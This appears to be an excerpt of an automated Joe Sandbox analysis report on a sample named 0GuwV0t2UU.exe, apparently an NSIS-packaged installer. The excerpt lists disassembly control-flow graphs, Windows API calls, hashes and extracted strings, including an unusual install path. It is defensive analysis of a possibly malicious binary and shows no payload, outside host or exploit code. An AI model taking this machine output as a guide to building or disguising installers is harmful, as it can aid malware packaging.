                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaC158.tmp
                                                      • API String ID: 2295610775-2599538234
                                                      • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                      • Instruction ID: 20279147522b4af1e9b85c80e58242a12c3cc79f3f19e9bc8d226ca4cfbd33e3
                                                      • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                      • Instruction Fuzzy Hash: 9FD012317595205BC640673C6E0C89B7E589F1A3317128A36F06BF21E4D7348C628A9C
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                      • Instruction ID: 5eb670257f645768a78f75f5229fdd379fa6a203c359b676d04f77a704ba2a21
                                                      • Opcode Fuzzy Hash: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                      • Instruction Fuzzy Hash: 9DF08271A04105AADB00EBA5D9499AEB378EF14314F60017BE111F31E5D7B88E51DB29

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 151 40508e-4050da GetDlgItem * 2 152 4050e0-405178 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 151->152 153 405305-40530c 151->153 156 405187-40518e DeleteObject 152->156 157 40517a-405185 SendMessageW 152->157 154 405320 153->154 155 40530e-40531e 153->155 158 405323-40532c 154->158 155->158 159 405190-405198 156->159 157->156 160 405337-40533d 158->160 161 40532e-405331 158->161 162 4051c1-4051c5 159->162 163 40519a-40519d 159->163 166 40534c-405353 160->166 167 40533f-405346 160->167 161->160 165 40541b-405422 161->165 162->159 164 4051c7-4051f7 call 404621 * 2 162->164 168 4051a2-4051bf call 4066df SendMessageW * 2 163->168 169 40519f 163->169 207 4052c7-4052da GetWindowLongW SetWindowLongW 164->207 208 4051fd-405203 164->208 171 405493-40549b 165->171 172 405424-40542a 165->172 173 405355-405358 166->173 174 4053c8-4053cb 166->174 167->165 167->166 168->162 169->168 180 4054a5-4054ac 171->180 181 40549d-4054a3 SendMessageW 171->181 177 405430-40543a 172->177 178 405686-405698 call 404688 172->178 182 405363-405378 call 404fdc 173->182 183 40535a-405361 173->183 174->165 179 4053cd-4053d7 174->179 177->178 189 405440-40544f SendMessageW 177->189 190 4053e7-4053f1 179->190 191 4053d9-4053e5 SendMessageW 179->191 185 4054e0-4054e7 180->185 186 4054ae-4054b5 180->186 181->180 182->174 206 40537a-40538b 182->206 183->174 183->182 199 405648-40564f 185->199 200 4054ed-4054f9 call 4011ef 185->200 195 4054b7-4054b8 ImageList_Destroy 186->195 196 4054be-4054c5 186->196 189->178 201 405455-405466 SendMessageW 189->201 190->165 193 4053f3-4053fd 190->193 191->190 202 40540e-405418 193->202 203 4053ff-40540c 193->203 195->196 204 4054c7-4054c8 GlobalFree 196->204 205 4054ce-4054da 196->205 199->178 212 405651-405658 199->212 225 405509-40550c 200->225 226 4054fb-4054fe 200->226 210 405470-405472 201->210 211 405468-40546e 201->211 202->165 203->165 204->205 205->185 206->174 214 40538d-40538f 206->214 213 4052e0-4052e3 207->213 215 405206-40520c 208->215 217 405473-40548c call 401299 SendMessageW 210->217 211->210 211->217 212->178 218 40565a-405684 ShowWindow GetDlgItem ShowWindow 212->218 219 4052e5-4052f8 ShowWindow call 404656 213->219 220 4052fd-405300 call 404656 213->220 221 405391-405398 214->221 222 4053a2 214->222 223 405212-40523d 215->223 224 4052a9-4052bc 215->224 217->171 218->178 219->178 220->153 230 40539a-40539c 221->230 231 40539e-4053a0 221->231 232 4053a5-4053c1 call 40117d 222->232 233 405279-40527b 223->233 234 40523f-405277 SendMessageW 223->234 224->215 238 4052c2-4052c5 224->238 239 40554d-405571 call 4011ef 225->239 240 40550e-405527 call 4012e2 call 401299 225->240 235 405500 226->235 236 405501-405504 call 40505c 226->236 230->232 231->232 232->174 244 405291-4052a6 SendMessageW 233->244 245 40527d-40528f SendMessageW 233->245 234->224 235->236 236->225 238->207 238->213 252 405613-40561c 239->252 253 405577 239->253 258 405537-405546 SendMessageW 240->258 259 405529-40552f 240->259 244->224 245->224 255 40562a-405632 252->255 256 40561e-405624 InvalidateRect 252->256 257 40557a-405585 253->257 255->199 262 405634-405643 call 404faf call 404f97 255->262 256->255 260 405587-405596 257->260 261 4055fb-40560d 257->261 258->239 263 405531 259->263 264 405532-405535 259->264 266 405598-4055a5 260->266 267 4055a9-4055ac 260->267 261->252 261->257 262->199 263->264 264->258 264->259 266->267 268 4055b3-4055bc 267->268 269 4055ae-4055b1 267->269 271 4055c1-4055f9 SendMessageW * 2 268->271 272 4055be 268->272 269->271 271->261 272->271
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                      • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                      • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                      • DeleteObject.GDI32(00000000), ref: 00405188
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                        • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                      • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                      • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                      • GlobalFree.KERNEL32(?), ref: 004054C8
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                      • ShowWindow.USER32(?,00000000), ref: 00405672
                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                      • ShowWindow.USER32(00000000), ref: 00405684
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 2564846305-813528018
                                                      • Opcode ID: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                      • Instruction ID: 34ca0daebb1283ae0dea41fcbe79f03df20d3d5ccd25e7298a94edbde83860af
                                                      • Opcode Fuzzy Hash: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                      • Instruction Fuzzy Hash: F5028C70A00609AFDB20DF55CD45AAF7BB5FB84314F50857AF910BA2E1D7B98A42CF18

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 274 404122-404134 275 40413a-404140 274->275 276 40429b-4042aa 274->276 275->276 277 404146-40414f 275->277 278 4042f9-40430e 276->278 279 4042ac-4042f4 GetDlgItem * 2 call 404621 SetClassLongW call 40140b 276->279 283 404151-40415e SetWindowPos 277->283 284 404164-40416b 277->284 281 404310-404313 278->281 282 40434e-404353 call 40466d 278->282 279->278 286 404315-404320 call 401389 281->286 287 404346-404348 281->287 296 404358-404373 282->296 283->284 289 40416d-404187 ShowWindow 284->289 290 4041af-4041b5 284->290 286->287 313 404322-404341 SendMessageW 286->313 287->282 295 4045ee 287->295 297 404288-404296 call 404688 289->297 298 40418d-4041a0 GetWindowLongW 289->298 292 4041b7-4041c9 DestroyWindow 290->292 293 4041ce-4041d1 290->293 301 4045cb-4045d1 292->301 303 4041d3-4041df SetWindowLongW 293->303 304 4041e4-4041ea 293->304 302 4045f0-4045f7 295->302 307 404375-404377 call 40140b 296->307 308 40437c-404382 296->308 297->302 298->297 299 4041a6-4041a9 ShowWindow 298->299 299->290 301->295 309 4045d3-4045d9 301->309 303->302 304->297 312 4041f0-4041ff GetDlgItem 304->312 307->308 310 404388-404393 308->310 311 4045ac-4045c5 DestroyWindow EndDialog 308->311 309->295 316 4045db-4045e4 ShowWindow 309->316 310->311 317 404399-4043e6 call 4066df call 404621 * 3 GetDlgItem 310->317 311->301 318 404201-404218 SendMessageW IsWindowEnabled 312->318 319 40421e-404221 312->319 313->302 316->295 346 4043f0-40442c ShowWindow KiUserCallbackDispatcher call 404643 EnableWindow 317->346 347 4043e8-4043ed 317->347 318->295 318->319 321 404223-404224 319->321 322 404226-404229 319->322 324 404254-404259 call 4045fa 321->324 325 404237-40423c 322->325 326 40422b-404231 322->326 324->297 329 404272-404282 SendMessageW 325->329 331 40423e-404244 325->331 326->329 330 404233-404235 326->330 329->297 330->324 334 404246-40424c call 40140b 331->334 335 40425b-404264 call 40140b 331->335 342 404252 334->342 335->297 344 404266-404270 335->344 342->324 344->342 350 404431 346->350 351 40442e-40442f 346->351 347->346 352 404433-404461 GetSystemMenu EnableMenuItem SendMessageW 350->352 351->352 353 404463-404474 SendMessageW 352->353 354 404476 352->354 355 40447c-4044bb call 404656 call 404103 call 4066a2 lstrlenW call 4066df SetWindowTextW call 401389 353->355 354->355 355->296 366 4044c1-4044c3 355->366 366->296 367 4044c9-4044cd 366->367 368 4044ec-404500 DestroyWindow 367->368 369 4044cf-4044d5 367->369 368->301 371 404506-404533 CreateDialogParamW 368->371 369->295 370 4044db-4044e1 369->370 370->296 372 4044e7 370->372 371->301 373 404539-404590 call 404621 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 371->373 372->295 373->295 378 404592-4045aa ShowWindow call 40466d 373->378 378->301
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                      • ShowWindow.USER32(?), ref: 0040417E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                      • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                      • DestroyWindow.USER32 ref: 004041BD
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                      • GetDlgItem.USER32(?,?), ref: 004041F5
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                      • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                      • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                      • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                      • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                      • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404409
                                                      • EnableWindow.USER32(?,?), ref: 00404424
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                      • EnableMenuItem.USER32(00000000), ref: 00404441
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                      • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404496
                                                      • SetWindowTextW.USER32(?,00422F48), ref: 004044AA
                                                      • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: H/B
                                                      • API String ID: 121052019-184950203
                                                      • Opcode ID: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                      • Instruction ID: 9a8659dd655c0040c26f3da6c71aaed3cdb3e7512c47e66a19b3526095f1ef41
                                                      • Opcode Fuzzy Hash: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                      • Instruction Fuzzy Hash: 0FC1CEB1600604BBDB216F61EE85E2B7A68FB85345F41093EF741B25F0CB799842DB2D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 381 403d74-403d8c call 406a96 384 403da0-403dd7 call 406570 381->384 385 403d8e-403d99 GetUserDefaultUILanguage call 4065e9 381->385 391 403dd9-403dea call 406570 384->391 392 403def-403df5 lstrcatW 384->392 388 403d9e 385->388 390 403dfa-403e23 call 40404a call 406079 388->390 398 403eb5-403ebd call 406079 390->398 399 403e29-403e2e 390->399 391->392 392->390 405 403ecb-403ef0 LoadImageW 398->405 406 403ebf-403ec6 call 4066df 398->406 399->398 400 403e34-403e5c call 406570 399->400 400->398 407 403e5e-403e62 400->407 409 403f71-403f79 call 40140b 405->409 410 403ef2-403f22 RegisterClassW 405->410 406->405 411 403e74-403e80 lstrlenW 407->411 412 403e64-403e71 call 405f9e 407->412 424 403f83-403f8e call 40404a 409->424 425 403f7b-403f7e 409->425 413 404040 410->413 414 403f28-403f6c SystemParametersInfoW CreateWindowExW 410->414 418 403e82-403e90 lstrcmpiW 411->418 419 403ea8-403eb0 call 405f71 call 4066a2 411->419 412->411 417 404042-404049 413->417 414->409 418->419 423 403e92-403e9c GetFileAttributesW 418->423 419->398 428 403ea2-403ea3 call 405fbd 423->428 429 403e9e-403ea0 423->429 433 403f94-403fae ShowWindow call 406a26 424->433 434 404017-40401f call 4057fa 424->434 425->417 428->419 429->419 429->428 441 403fb0-403fb5 call 406a26 433->441 442 403fba-403fcc GetClassInfoW 433->442 439 404021-404027 434->439 440 404039-40403b call 40140b 434->440 439->425 443 40402d-404034 call 40140b 439->443 440->413 441->442 446 403fe4-404007 DialogBoxParamW call 40140b 442->446 447 403fce-403fde GetClassInfoW RegisterClassW 442->447 443->425 451 40400c-404015 call 403cc4 446->451 447->446 451->417
                                                      APIs
                                                        • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                        • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00008001), ref: 00403D8E
                                                        • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                      • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00008001), ref: 00403DF5
                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\fllesskabsejede\Modfaldent,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75573420), ref: 00403E75
                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\fllesskabsejede\Modfaldent,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E88
                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403E93
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\fllesskabsejede\Modfaldent), ref: 00403EDC
                                                      • RegisterClassW.USER32(00428A00), ref: 00403F19
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FC8
                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FD5
                                                      • RegisterClassW.USER32(00428A00), ref: 00403FDE
                                                      • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\fllesskabsejede\Modfaldent$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                      • API String ID: 606308-352171118
                                                      • Opcode ID: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                      • Instruction ID: c4c704bd5297fd73affe36db923882850e9d0fe41f98d1713f1e709c6875f219
                                                      • Opcode Fuzzy Hash: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                      • Instruction Fuzzy Hash: E061C670240701BAD620AB66AD46F2B3A7CEB85745F41453FF941B22E2DF7D5D02CA2D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 454 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 457 403145-40314a 454->457 458 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 454->458 459 40338f-403393 457->459 466 403183 458->466 467 403268-403276 call 403053 458->467 469 403188-40319f 466->469 473 403347-40334c 467->473 474 40327c-40327f 467->474 471 4031a1 469->471 472 4031a3-4031ac call 403607 469->472 471->472 481 4031b2-4031b9 472->481 482 403303-40330b call 403053 472->482 473->459 476 403281-403299 call 40361d call 403607 474->476 477 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 474->477 476->473 505 40329f-4032a5 476->505 503 4032f9-4032fe 477->503 504 40330d-40333d call 40361d call 403396 477->504 486 403235-403239 481->486 487 4031bb-4031cf call 40614d 481->487 482->473 492 403243-403249 486->492 493 40323b-403242 call 403053 486->493 487->492 501 4031d1-4031d8 487->501 494 403258-403260 492->494 495 40324b-403255 call 406b83 492->495 493->492 494->469 502 403266 494->502 495->494 501->492 508 4031da-4031e1 501->508 502->467 503->459 515 403342-403345 504->515 505->473 505->477 508->492 510 4031e3-4031ea 508->510 510->492 512 4031ec-4031f3 510->512 512->492 514 4031f5-403215 512->514 514->473 516 40321b-40321f 514->516 515->473 517 40334e-40335f 515->517 518 403221-403225 516->518 519 403227-40322f 516->519 520 403361 517->520 521 403367-40336c 517->521 518->502 518->519 519->492 523 403231-403233 519->523 520->521 522 40336d-403373 521->522 522->522 524 403375-40338d call 40614d 522->524 523->492 524->459
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403109
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\0GuwV0t2UU.exe,00000400), ref: 00403125
                                                        • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00406196
                                                        • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\0GuwV0t2UU.exe,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 0040316E
                                                      • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 004032B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\0GuwV0t2UU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
